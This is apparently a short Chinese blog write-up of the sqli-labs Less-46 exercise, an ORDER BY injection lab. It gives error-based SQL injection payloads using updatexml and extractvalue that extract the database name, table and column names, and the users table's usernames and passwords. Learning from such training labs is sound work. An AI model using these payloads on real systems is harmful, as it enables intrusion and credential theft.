Less(46)

1.看一下php

  

 

   (1)用order by 注入来看看

    

 

     

 

   (2)通过asc 和desc查看返回数据是否相同来简单判断是否存在order  by注入

     ?sort=1+asc

      

    ?sort=1+desc
      

      

 

 2.报错注入

  (1)爆库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0))

    

 

   (2)爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="security" and table_name not in('emails','referers'))),0))      

 

     

 

   (3)爆列名:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('first_name','last_name','user_id','last_login','avatar','failed_login','user'))),0))

    

  (4)爆值:?sort=1 and (extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))))

    

 

posted @ 2020-03-14 11:47  孟雨  阅读(154)  评论(0编辑  收藏  举报